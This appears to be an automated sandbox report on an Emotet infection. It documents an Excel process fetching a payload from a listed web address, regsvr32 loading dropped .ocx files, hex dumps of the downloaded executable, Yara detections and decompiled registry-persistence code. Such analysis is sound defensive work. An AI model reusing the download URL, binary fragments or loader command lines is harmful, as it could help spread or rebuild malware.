00 00 00 00 00 00 00 00 d0 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 b4 05 00 00 10 00 00 00 b6 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 2d 01 00 00 d0 05 00 00 2e 01 00 00 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 27 00 00 00 00 07 00 00 0e 00 00 00 e8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 38 46 00 00 00 30 07 00 00 48 00 00 00 f6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 80 07 00 00 02 00 00 00 3e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 20
                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$dt7t7t7ww6t7wq6!t7wp6t7q6t7p6t7w6t7wu6t7u7t7eq6t7et6t7e7t77t7ev6t7Richt7PEd)vb" \T,` d 08FP88.text `.rdata-.@@.data@'@.pdata8F0H@@_RDATA>@@.rsrc
                                                                                                            Jul 17, 2022 13:13:34.559185028 CEST916INData Raw: b0 05 00 00 90 07 00 00 b2 05 00 00 40 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 08 00 00 00 50 0d 00 00 0a 00 00 00 f2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: @@@.relocP@B
                                                                                                            Jul 17, 2022 13:13:34.559231043 CEST917INData Raw: 03 c0 4c 2b da 48 85 c0 74 1c 45 0f b7 04 13 66 45 85 c0 74 11 66 44 89 02 48 ff c8 48 83 c2 02 48 83 e9 01 75 df 48 85 c9 48 8d 42 fe 48 0f 45 c2 48 f7 d9 66 89 18 1b c0 f7 d0 25 7a 00 07 80 eb 05 b8 57 00 07 80 48 8b 5c 24 08 c3 4c 89 44 24 18
                                                                                                            Data Ascii: L+HtEfEtfDHHHuHHBHEHf%zWH\$LD$LL$ SUVWAVAWH8HB3ILH=vWHtXfSL$HrL|$(LLH\$ IHH]HxHH;wuzfAvH8A_A^_^][H(LL
                                                                                                            Jul 17, 2022 13:13:34.559269905 CEST918INData Raw: 5c 24 78 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 b8 01 40 00 80 c3 cc cc 33 c0 c3 cc b8 01 40 00 80 c3 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b fa 48 8b f1 48 85 c9 74 38 48 85 d2 74 33 b9 c0 01 00 00 e8 63 0e 00 00 48 8b
                                                                                                            Data Ascii: \$xH0A_A^A]A\_^]@3@H\$Ht$WH HHHt8Ht3cHHu3AH,H33H@H\$0Ht$8H _H\$WH HHHu@>HHt-t$HuH3@H\$0H _
                                                                                                            Jul 17, 2022 13:13:34.559447050 CEST920INData Raw: 89 44 24 38 48 c7 c1 02 00 00 80 48 83 64 24 30 00 c7 44 24 28 06 00 02 00 83 64 24 20 00 ff 15 4d b1 05 00 85 c0 74 15 48 8b 4c 24 50 ff 15 46 b1 05 00 b8 ff ff 00 80 e9 d1 00 00 00 48 8b 0d 05 ee 06 00 48 8d 95 b0 00 00 00 41 b8 04 01 00 00 ff
                                                                                                            Data Ascii: D$8HHd$0D$(d$ MtHL$PFHHAZH{AHL$PD$(E3HHD$ uHHT$`|HL$PxH8HE$D$(AE3HD$ HL$PWHDHHD$`DL$(E3HD$
                                                                                                            Jul 17, 2022 13:13:34.559513092 CEST921INData Raw: b2 05 00 48 83 c1 28 89 44 24 20 ba c8 00 00 00 e8 8a f0 ff ff 45 33 c9 85 c0 79 0d bb 05 40 00 80 44 89 0f e9 5b 02 00 00 48 8b 46 08 48 85 c0 0f 84 3b 02 00 00 44 8b 70 1c 44 8b 68 18 44 89 74 24 30 44 89 6c 24 34 45 85 f6 0f 84 20 02 00 00 45
                                                                                                            Data Ascii: H(D$ E3y@D[HFH;DpDhDt$0Dl$4E EEDD3AA;rAA3LHu@L3I/"HN 3HthDLI9ivKLVAAA+BAzDEuAA+AzE;s#A;sEAI
                                                                                                            Jul 17, 2022 13:13:34.559678078 CEST923INData Raw: 06 00 00 cc cc 48 83 ec 28 85 d2 74 39 83 ea 01 74 28 83 ea 01 74 16 83 fa 01 74 0a b8 01 00 00 00 48 83 c4 28 c3 e8 36 0c 00 00 eb 05 e8 07 0c 00 00 0f b6 c0 48 83 c4 28 c3 49 8b d0 48 83 c4 28 e9 0f 00 00 00 4d 85 c0 0f 95 c1 48 83 c4 28 e9 18
                                                                                                            Data Ascii: H(t9t(ttH(6H(IH(MH(H\$Ht$H|$ AVH HL3-D$@@=xtO5HHfsu)t HzHks
                                                                                                            Jul 17, 2022 13:13:34.559743881 CEST924INData Raw: 89 01 8b da 48 83 c1 08 e8 de 1c 00 00 f6 c3 01 74 0d ba 18 00 00 00 48 8b cf e8 e8 f9 ff ff 48 8b 5c 24 30 48 8b c7 48 83 c4 20 5f c3 cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8d 05 cb b3 05 00 48 8b f9 48 89 01 8b da 48 83 c1 08 e8 9a 1c 00 00 f6
                                                                                                            Data Ascii: HtHH\$0HH _H\$WH HHHHtHH\$0HH _HHHL$ "HHL$ HHHL$ ^HHL$ aHyH\HEAwn@SH H3Hr4H
                                                                                                            Jul 17, 2022 13:13:34.559909105 CEST926INData Raw: 31 45 10 ff 15 38 9d 05 00 8b 45 20 48 8d 4d 10 48 c1 e0 20 48 33 45 20 48 33 45 10 48 33 c1 48 b9 ff ff ff ff ff ff 00 00 48 23 c1 48 b9 33 a2 df 2d 99 2b 00 00 48 3b c3 48 0f 44 c1 48 89 05 d5 cc 06 00 48 8b 5c 24 48 48 f7 d0 48 89 05 be cc 06
                                                                                                            Data Ascii: 1E8E HMH H3E H3EH3HH#H3-+H;HDHH\$HHHH ]HH%H8HH(H$HH(H(H(xLcA<ADMHLADHMM;tAIH;rAAH;rI(I
                                                                                                            Jul 17, 2022 13:13:34.559950113 CEST927INData Raw: 05 00 48 8b 9d e8 00 00 00 48 8d 95 d8 04 00 00 48 8b cb 45 33 c0 ff 15 bb 97 05 00 48 85 c0 74 3c 48 83 64 24 38 00 48 8d 8d e0 04 00 00 48 8b 95 d8 04 00 00 4c 8b c8 48 89 4c 24 30 4c 8b c3 48 8d 8d e8 04 00 00 48 89 4c 24 28 48 8d 4d f0 48 89
                                                                                                            Data Ascii: HHHE3Ht<Hd$8HHLHL$0LHHL$(HMHL$ 3HHL$PH3HAHHXHHD$`D$P@D$T~HD$PHD$@HEHD$H3HL$@uuHH$
                                                                                                            Jul 17, 2022 13:13:34.748769045 CEST928INData Raw: 89 4c 24 08 89 54 24 0c 0f ba e3 09 73 0a 45 0b c1 44 89 05 d5 d4 06 00 c7 05 93 c2 06 00 01 00 00 00 44 89 0d 90 c2 06 00 0f ba e7 14 0f 83 91 00 00 00 44 89 0d 7b c2 06 00 bb 06 00 00 00 89 1d 74 c2 06 00 0f ba e7 1b 73 79 0f ba e7 1c 73 73 33
                                                                                                            Data Ascii: L$T$sEDDD{tsyss3H HHT$ HD$ ":uWF53A t8 D#D;uHD$ $<u@H\$(3Ht$0H_39X


                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            0192.168.2.224917151.38.169.114443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            2022-07-17 11:09:09 UTC0OUTGET /campusvirtual/EOgFGo17w/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: atperson.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2022-07-17 11:09:10 UTC0INHTTP/1.1 404 Not Found
                                                                                                            Date: Sun, 17 Jul 2022 11:09:09 GMT
                                                                                                            Server: Apache
                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                            Link: <https://atperson.com/wp-json/>; rel="https://api.w.org/"
                                                                                                            Vary: User-Agent
                                                                                                            Connection: close
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            2022-07-17 11:09:10 UTC0INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 65 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63
                                                                                                            Data Ascii: 2000<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="es" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" c
                                                                                                            2022-07-17 11:09:10 UTC8INData Raw: 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                                                                                            Data Ascii: ,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--pres
                                                                                                            2022-07-17 11:09:10 UTC8INData Raw: 0d 0a
                                                                                                            Data Ascii:


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:13:09:12
                                                                                                            Start date:17/07/2022
                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                            Imagebase:0x13f4e0000
                                                                                                            File size:28253536 bytes
                                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:13:09:20
                                                                                                            Start date:17/07/2022
                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx
                                                                                                            Imagebase:0xff4b0000
                                                                                                            File size:19456 bytes
                                                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:13:13:41
                                                                                                            Start date:17/07/2022
                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx
                                                                                                            Imagebase:0xff950000
                                                                                                            File size:19456 bytes
                                                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:13:13:41
                                                                                                            Start date:17/07/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                            Imagebase:0xff7d0000
                                                                                                            File size:27136 bytes
                                                                                                            MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:13:13:43
                                                                                                            Start date:17/07/2022
                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx
                                                                                                            Imagebase:0xffbd0000
                                                                                                            File size:19456 bytes
                                                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:13:13:46
                                                                                                            Start date:17/07/2022
                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx
                                                                                                            Imagebase:0xff050000
                                                                                                            File size:19456 bytes
                                                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:13:13:52
                                                                                                            Start date:17/07/2022
                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll"
                                                                                                            Imagebase:0xff050000
                                                                                                            File size:19456 bytes
                                                                                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.9%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:2.4%
                                                                                                              Total number of Nodes:85
                                                                                                              Total number of Limit Nodes:11
                                                                                                              execution_graph 25506 180003544 25511 180004ed0 25506->25511 25510 180003551 25517 18000e110 25511->25517 25514 18003c31c 25522 18003d168 GetLastError 25514->25522 25516 18003c325 25516->25510 25518 18000354d 25517->25518 25519 18000e12f GetLastError 25517->25519 25518->25510 25518->25514 25521 18000e142 _CreateFrameInfo 25519->25521 25520 18000e1b4 SetLastError 25520->25518 25521->25520 25523 18003d1a9 FlsSetValue 25522->25523 25529 18003d18c 25522->25529 25524 18003d199 25523->25524 25525 18003d1bb 25523->25525 25526 18003d215 SetLastError 25524->25526 25539 180042404 25525->25539 25526->25516 25528 18003d1ca 25530 18003d1e8 FlsSetValue 25528->25530 25531 18003d1d8 FlsSetValue 25528->25531 25529->25523 25529->25524 25533 18003d1f4 FlsSetValue 25530->25533 25534 18003d206 25530->25534 25532 18003d1e1 25531->25532 25543 18003f8f4 25532->25543 25533->25532 25547 18003c9f0 5 API calls _CreateFrameInfo 25534->25547 25537 18003d20e 25538 18003f8f4 _freea 2 API calls 25537->25538 25538->25526 25540 180042415 _CreateFrameInfo 25539->25540 25541 18004244a RtlAllocateHeap 25540->25541 25542 180042464 25540->25542 25541->25540 25541->25542 25542->25528 25544 18003f8f9 HeapFree 25543->25544 25546 18003f921 25543->25546 25545 18003f914 GetLastError 25544->25545 25544->25546 25545->25546 25546->25524 25547->25537 25548 180004ea8 25555 18000e28c 25548->25555 25551 180004eb5 25564 18000fa18 25555->25564 25558 180004eb1 25558->25551 25560 18000e220 25558->25560 25580 18000f8ec 25560->25580 25570 18000f550 25564->25570 25567 18000fa63 InitializeCriticalSectionAndSpinCount 25568 18000e2a4 25567->25568 25568->25558 25569 18000e2dc DeleteCriticalSection 25568->25569 25569->25558 25571 18000f594 try_load_library_from_system_directory 25570->25571 25572 18000f677 25570->25572 25571->25572 25573 18000f5c2 LoadLibraryExW 25571->25573 25574 18000f659 GetProcAddress 25571->25574 25579 18000f605 LoadLibraryExW 25571->25579 25572->25567 25572->25568 25575 18000f5e3 GetLastError 25573->25575 25576 18000f639 25573->25576 25574->25572 25578 18000f66a 25574->25578 25575->25571 25576->25574 25577 18000f650 FreeLibrary 25576->25577 25577->25574 25578->25572 25579->25571 25579->25576 25581 18000f550 __vcrt_InitializeCriticalSectionEx 5 API calls 25580->25581 25583 18000f911 TlsAlloc 25581->25583 25584 180001e0c 25600 180001590 25584->25600 25586 180001e56 RtlExitUserProcess 25587 180001fa3 25586->25587 25588 180001e66 RegDeleteKeyW RegCreateKeyExW 25586->25588 25603 1800028f0 25587->25603 25589 180001ed4 GetModuleFileNameW RegSetValueExW 25588->25589 25590 180001ebf 25588->25590 25589->25590 25592 180001f1f 25589->25592 25591 180001ec4 RegCloseKey 25590->25591 25591->25587 25602 1800011ac 5 API calls memcpy_s 25592->25602 25596 180001f30 25596->25591 25597 180001f39 RegSetValueExW 25596->25597 25597->25591 25598 180001f6d RegSetValueExW 25597->25598 25598->25591 25599 180001f9d RegCloseKey 25598->25599 25599->25587 25601 180001677 25600->25601 25601->25586 25602->25596 25604 1800028f9 25603->25604 25605 180001fb4 25604->25605 25606 180002f48 IsProcessorFeaturePresent 25604->25606 25607 180002f60 25606->25607 25612 18000324c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25607->25612 25609 180002f73 25613 180002f14 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25609->25613 25612->25609 25614 180002810 25617 18000281b 25614->25617 25615 180002834 25616 180002845 25622 180002ed8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25616->25622 25617->25615 25617->25616 25621 180002eb8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25617->25621 25620 18000284b 25622->25620

                                                                                                              Executed Functions

                                                                                                              Function 0000000180001E0C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86registryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$Close$CreateDeleteExitFileModuleNameProcessUser
                                                                                                              • String ID: OPXDZsqAzHjvGTdEqw
                                                                                                              • API String ID: 2935268270-1865718181
                                                                                                              • Opcode ID: 3950ca9deb4323522b375455de36fa7ff33fd3590fcfb785640776e1a3bb85fb
                                                                                                              • Instruction ID: 63a891c2f900980e6607cc3424fc366237d0ca6d1189310c722c4d8ed4b96dc4
                                                                                                              • Opcode Fuzzy Hash: 3950ca9deb4323522b375455de36fa7ff33fd3590fcfb785640776e1a3bb85fb
                                                                                                              • Instruction Fuzzy Hash: C9414972214A89C6EBA1CB61E8447DA73A4F7887D8F409216B94D47BA8DF7DC24DCB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180046D38 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              C-Code - Quality: 77%
                                                                                                              			E00000001180046D38(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				void* _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				WCHAR* _t93;
				long _t96;
				void* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				r15d = __ecx;
				_t90 =  *0x80070098; // 0xde2ac6aee6eb
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x180000000 + 0x71f90 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0x80046e7e;
				if (_t72 == 0) goto 0x80046da1;
				_t57 = _t72;
				goto 0x80046e80;
				if (__r8 == __r9) goto 0x80046e63;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8));
				if (_t61 == 0) goto 0x80046dc8;
				if (_t61 != _t76) goto 0x80046ebd;
				goto 0x80046e4f;
				r8d = 0x800; // executed
				LoadLibraryExW(_t104, _t99, _t96); // executed
				if (_t57 != 0) goto 0x80046e9d;
				if (GetLastError() != 0x57) goto 0x80046e3d;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E0000000118003C5E8(_t90) == 0) goto 0x80046e3d;
				r8d = _t37;
				if (E0000000118003C5E8(_t90) == 0) goto 0x80046e3d;
				r8d = 0;
				LoadLibraryExW(_t93, _t75);
				if (_t57 != 0) goto 0x80046e9d;
				 *((intOrPtr*)(0x180000000 + 0x71ef0 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0x80046daa;
				_t91 =  *0x80070098; // 0xde2ac6aee6eb
				asm("dec eax");
				 *(0x180000000 + 0x71f90 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

















                                                                                                              0x180046d38
                                                                                                              0x180046d3d
                                                                                                              0x180046d42
                                                                                                              0x180046d54
                                                                                                              0x180046d6f
                                                                                                              0x180046d76
                                                                                                              0x180046d80
                                                                                                              0x180046d88
                                                                                                              0x180046d8e
                                                                                                              0x180046d97
                                                                                                              0x180046d99
                                                                                                              0x180046d9c
                                                                                                              0x180046da4
                                                                                                              0x180046dad
                                                                                                              0x180046db8
                                                                                                              0x180046dbd
                                                                                                              0x180046dc3
                                                                                                              0x180046dd5
                                                                                                              0x180046ddb
                                                                                                              0x180046de7
                                                                                                              0x180046df6
                                                                                                              0x180046df8
                                                                                                              0x180046df8
                                                                                                              0x180046dfe
                                                                                                              0x180046e0f
                                                                                                              0x180046e11
                                                                                                              0x180046e25
                                                                                                              0x180046e27
                                                                                                              0x180046e2f
                                                                                                              0x180046e3b
                                                                                                              0x180046e47
                                                                                                              0x180046e56
                                                                                                              0x180046e5c
                                                                                                              0x180046e70
                                                                                                              0x180046e76
                                                                                                              0x180046e9c

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                              • API String ID: 3013587201-537541572
                                                                                                              • Opcode ID: 4272bd44501fadda342918ba32e514b2cb81dd19851a8ddf47d7ea8790db32cc
                                                                                                              • Instruction ID: 824b752b177edb4b05612529a335346cb82f1823fc0870321cef3e784436dcc0
                                                                                                              • Opcode Fuzzy Hash: 4272bd44501fadda342918ba32e514b2cb81dd19851a8ddf47d7ea8790db32cc
                                                                                                              • Instruction Fuzzy Hash: 4E411D76B10E0881FA93DB16E8403D523D2AB4CBE4F09C126FD198B7A4EE3DD6898344
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180002910 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
